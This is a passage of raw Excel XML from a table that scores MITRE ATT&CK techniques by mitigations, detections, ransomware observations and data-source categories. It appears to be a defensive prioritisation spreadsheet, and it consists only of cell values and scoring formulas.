        <f t="array" ref="AG472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD472)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH472" s="37">
        <v>468</v>
      </c>
      <c r="AI472" s="37" t="str" cm="1">
        <f t="array" ref="AI472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD472)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ472" s="37">
        <v>468</v>
      </c>
      <c r="AK472" s="37" t="str" cm="1">
        <f t="array" ref="AK472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD472)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL472" s="37">
        <v>468</v>
      </c>
      <c r="AM472" s="37" t="str" cm="1">
        <f t="array" ref="AM472">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD472)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN472" s="37">
        <v>0</v>
      </c>
      <c r="AO472" s="37">
        <v>0</v>
      </c>
      <c r="AP472" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ472" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>349.32948400000004</v>
      </c>
      <c r="AR472" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS472" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT472" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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73" spans="1:47" ht="51">
      <c r="A473" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B473" s="37">
        <f t="shared" si="7"/>
        <v>1108.0469073333334</v>
      </c>
      <c r="C473" s="37" t="s">
        <v>1657</v>
      </c>
      <c r="D473" s="50" t="s">
        <v>1658</v>
      </c>
      <c r="E473" s="37"/>
      <c r="F473" s="37">
        <v>1</v>
      </c>
      <c r="G473" s="37">
        <v>1</v>
      </c>
      <c r="H473" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I473" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J473" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K473" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L473" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M473" s="37">
        <v>2.8424000000000001E-2</v>
      </c>
      <c r="N473" s="56">
        <v>0</v>
      </c>
      <c r="O473" s="56">
        <v>15</v>
      </c>
      <c r="P473" s="56">
        <v>11</v>
      </c>
      <c r="Q473" s="56">
        <v>29</v>
      </c>
      <c r="R473" s="57" t="s">
        <v>1659</v>
      </c>
      <c r="S473" s="57">
        <v>9</v>
      </c>
      <c r="T473" s="57" t="s">
        <v>1660</v>
      </c>
      <c r="U473" s="57">
        <v>12</v>
      </c>
      <c r="V473" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.46190466666666669</v>
      </c>
      <c r="W473" s="37">
        <v>21</v>
      </c>
      <c r="X473" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y473" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z473" s="37">
        <v>55</v>
      </c>
      <c r="AA473" s="37">
        <v>0.55000000000000004</v>
      </c>
      <c r="AB473" s="37">
        <v>0.55000000000000004</v>
      </c>
      <c r="AC473" s="37"/>
      <c r="AD473" s="50" t="s">
        <v>1661</v>
      </c>
      <c r="AE473" s="37" t="str" cm="1">
        <f t="array" ref="AE473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD473)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF473" s="37">
        <v>469</v>
      </c>
      <c r="AG473" s="37" t="str" cm="1">
        <f t="array" ref="AG473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD473)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH473" s="37">
        <v>469</v>
      </c>
      <c r="AI473" s="37" t="str" cm="1">
        <f t="array" ref="AI473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD473)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ473" s="37">
        <v>469</v>
      </c>
      <c r="AK473" s="37" t="str" cm="1">
        <f t="array" ref="AK473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD473)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL473" s="37">
        <v>469</v>
      </c>
      <c r="AM473" s="37" t="str" cm="1">
        <f t="array" ref="AM473">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD473)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN473" s="37">
        <v>0</v>
      </c>
      <c r="AO473" s="37">
        <v>5</v>
      </c>
      <c r="AP473" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ473" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>369.3489691111111</v>
      </c>
      <c r="AR473" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS473" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT473" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU47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44.089162989417986</v>
      </c>
    </row>
    <row r="474" spans="1:47" ht="51">
      <c r="A474" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="B474" s="37">
        <f t="shared" si="7"/>
        <v>653.87124942857145</v>
      </c>
      <c r="C474" s="37" t="s">
        <v>1662</v>
      </c>
      <c r="D474" s="50" t="s">
        <v>1658</v>
      </c>
      <c r="E474" s="37" t="s">
        <v>1663</v>
      </c>
      <c r="F474" s="37">
        <v>1</v>
      </c>
      <c r="G474" s="37">
        <v>1</v>
      </c>
      <c r="H474" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I474" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J474" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K474" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L474" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M474" s="37">
        <v>0</v>
      </c>
      <c r="N474" s="56">
        <v>0</v>
      </c>
      <c r="O474" s="56">
        <v>1</v>
      </c>
      <c r="P474" s="56">
        <v>8</v>
      </c>
      <c r="Q474" s="56">
        <v>1</v>
      </c>
      <c r="R474" s="57" t="s">
        <v>1659</v>
      </c>
      <c r="S474" s="57">
        <v>9</v>
      </c>
      <c r="T474" s="57" t="s">
        <v>1660</v>
      </c>
      <c r="U474" s="57">
        <v>12</v>
      </c>
      <c r="V474" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24761895238095238</v>
      </c>
      <c r="W474" s="37">
        <v>21</v>
      </c>
      <c r="X474" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y474" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z474" s="37">
        <v>10</v>
      </c>
      <c r="AA474" s="37">
        <v>0.1</v>
      </c>
      <c r="AB474" s="37">
        <v>0.1</v>
      </c>
      <c r="AC474" s="37"/>
      <c r="AD474" s="50" t="s">
        <v>1661</v>
      </c>
      <c r="AE474" s="37" t="str" cm="1">
        <f t="array" ref="AE474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD474)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF474" s="37">
        <v>470</v>
      </c>
      <c r="AG474" s="37" t="str" cm="1">
        <f t="array" ref="AG474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD474)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH474" s="37">
        <v>470</v>
      </c>
      <c r="AI474" s="37" t="str" cm="1">
        <f t="array" ref="AI474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD474)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ474" s="37">
        <v>470</v>
      </c>
      <c r="AK474" s="37" t="str" cm="1">
        <f t="array" ref="AK474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD474)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL474" s="37">
        <v>470</v>
      </c>
      <c r="AM474" s="37" t="str" cm="1">
        <f t="array" ref="AM474">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD474)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN474" s="37">
        <v>0</v>
      </c>
      <c r="AO474" s="37">
        <v>7</v>
      </c>
      <c r="AP474" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="AQ474" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>217.95708314285716</v>
      </c>
      <c r="AR474" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS474" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT474" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU47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36.492847190476184</v>
      </c>
    </row>
    <row r="475" spans="1:47" ht="51">
      <c r="A475" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B475" s="37">
        <f t="shared" si="7"/>
        <v>484.71419595238098</v>
      </c>
      <c r="C475" s="37" t="s">
        <v>1664</v>
      </c>
      <c r="D475" s="50" t="s">
        <v>1658</v>
      </c>
      <c r="E475" s="37" t="s">
        <v>1665</v>
      </c>
      <c r="F475" s="37">
        <v>1</v>
      </c>
      <c r="G475" s="37">
        <v>1</v>
      </c>
      <c r="H475" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I475" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J475" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K475" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L475" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M475" s="37">
        <v>0</v>
      </c>
      <c r="N475" s="56">
        <v>0</v>
      </c>
      <c r="O475" s="56">
        <v>0</v>
      </c>
      <c r="P475" s="56">
        <v>0</v>
      </c>
      <c r="Q475" s="56">
        <v>1</v>
      </c>
      <c r="R475" s="57" t="s">
        <v>1666</v>
      </c>
      <c r="S475" s="57">
        <v>5</v>
      </c>
      <c r="T475" s="57" t="s">
        <v>1667</v>
      </c>
      <c r="U475" s="57">
        <v>11</v>
      </c>
      <c r="V475" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15714280952380952</v>
      </c>
      <c r="W475" s="37">
        <v>16</v>
      </c>
      <c r="X475" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y475" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z475" s="37">
        <v>1</v>
      </c>
      <c r="AA475" s="37">
        <v>0.01</v>
      </c>
      <c r="AB475" s="37">
        <v>0.01</v>
      </c>
      <c r="AC475" s="37"/>
      <c r="AD475" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="AE475" s="37" t="str" cm="1">
        <f t="array" ref="AE475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD475)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF475" s="37">
        <v>471</v>
      </c>
      <c r="AG475" s="37" t="str" cm="1">
        <f t="array" ref="AG475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD475)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH475" s="37">
        <v>471</v>
      </c>
      <c r="AI475" s="37" t="str" cm="1">
        <f t="array" ref="AI475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD475)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ475" s="37">
        <v>471</v>
      </c>
      <c r="AK475" s="37" t="str" cm="1">
        <f t="array" ref="AK475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD475)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL475" s="37">
        <v>471</v>
      </c>
      <c r="AM475" s="37" t="str" cm="1">
        <f t="array" ref="AM475">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD475)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN475" s="37">
        <v>0</v>
      </c>
      <c r="AO475" s="37">
        <v>5</v>
      </c>
      <c r="AP475" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ475" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>161.57139865079367</v>
      </c>
      <c r="AR475" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS475" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT475" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU47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19.353737934618291</v>
      </c>
    </row>
    <row r="476" spans="1:47" ht="51">
      <c r="A476" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B476" s="37">
        <f t="shared" si="7"/>
        <v>530.71859785714287</v>
      </c>
      <c r="C476" s="37" t="s">
        <v>1668</v>
      </c>
      <c r="D476" s="50" t="s">
        <v>1658</v>
      </c>
      <c r="E476" s="37" t="s">
        <v>1669</v>
      </c>
      <c r="F476" s="37">
        <v>1</v>
      </c>
      <c r="G476" s="37">
        <v>1</v>
      </c>
      <c r="H476" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I476" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J476" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K476" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L476" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M476" s="37">
        <v>0</v>
      </c>
      <c r="N476" s="56">
        <v>0</v>
      </c>
      <c r="O476" s="56">
        <v>7</v>
      </c>
      <c r="P476" s="56">
        <v>1</v>
      </c>
      <c r="Q476" s="56">
        <v>2</v>
      </c>
      <c r="R476" s="57" t="s">
        <v>1670</v>
      </c>
      <c r="S476" s="57">
        <v>6</v>
      </c>
      <c r="T476" s="57" t="s">
        <v>1671</v>
      </c>
      <c r="U476" s="57">
        <v>8</v>
      </c>
      <c r="V476" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095214285714287</v>
      </c>
      <c r="W476" s="37">
        <v>14</v>
      </c>
      <c r="X476" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y476" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z476" s="37">
        <v>10</v>
      </c>
      <c r="AA476" s="37">
        <v>0.1</v>
      </c>
      <c r="AB476" s="37">
        <v>0.1</v>
      </c>
      <c r="AC476" s="37"/>
      <c r="AD476" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="AE476" s="37" t="str" cm="1">
        <f t="array" ref="AE476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD476)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF476" s="37">
        <v>472</v>
      </c>
      <c r="AG476" s="37" t="str" cm="1">
        <f t="array" ref="AG476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD476)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH476" s="37">
        <v>472</v>
      </c>
      <c r="AI476" s="37" t="str" cm="1">
        <f t="array" ref="AI476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD476)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ476" s="37">
        <v>472</v>
      </c>
      <c r="AK476" s="37" t="str" cm="1">
        <f t="array" ref="AK476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD476)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL476" s="37">
        <v>472</v>
      </c>
      <c r="AM476" s="37" t="str" cm="1">
        <f t="array" ref="AM476">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD476)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN476" s="37">
        <v>0</v>
      </c>
      <c r="AO476" s="37">
        <v>0</v>
      </c>
      <c r="AP476" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ476" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>176.90619928571428</v>
      </c>
      <c r="AR476" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS476" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT476" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU47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77" spans="1:47" ht="17">
      <c r="A477" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B477" s="37">
        <f t="shared" si="7"/>
        <v>189.3</v>
      </c>
      <c r="C477" s="37" t="s">
        <v>3809</v>
      </c>
      <c r="D477" s="50" t="s">
        <v>1658</v>
      </c>
      <c r="E477" s="37" t="s">
        <v>3810</v>
      </c>
      <c r="F477" s="37">
        <v>1</v>
      </c>
      <c r="G477" s="37">
        <v>1</v>
      </c>
      <c r="H477" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I477" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J477" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K477" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L477" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M477" s="37">
        <v>0</v>
      </c>
      <c r="N477" s="56">
        <v>0</v>
      </c>
      <c r="O477" s="56">
        <v>0</v>
      </c>
      <c r="P477" s="56">
        <v>0</v>
      </c>
      <c r="Q477" s="56">
        <v>0</v>
      </c>
      <c r="R477" s="57"/>
      <c r="S477" s="57"/>
      <c r="T477" s="57"/>
      <c r="U477" s="57"/>
      <c r="V477" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W477" s="37"/>
      <c r="X477" s="37"/>
      <c r="Y477" s="37"/>
      <c r="Z477" s="37"/>
      <c r="AA477" s="37"/>
      <c r="AB477" s="37"/>
      <c r="AC477" s="37"/>
      <c r="AD477" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE477" s="37" t="str" cm="1">
        <f t="array" ref="AE477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD477)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF477" s="37">
        <v>473</v>
      </c>
      <c r="AG477" s="37" t="str" cm="1">
        <f t="array" ref="AG477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD477)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH477" s="37">
        <v>473</v>
      </c>
      <c r="AI477" s="37" t="str" cm="1">
        <f t="array" ref="AI477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD477)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ477" s="37">
        <v>473</v>
      </c>
      <c r="AK477" s="37" t="str" cm="1">
        <f t="array" ref="AK477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD477)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL477" s="37">
        <v>473</v>
      </c>
      <c r="AM477" s="37" t="str" cm="1">
        <f t="array" ref="AM477">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD477)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN477" s="37"/>
      <c r="AO477" s="37"/>
      <c r="AP477" s="37">
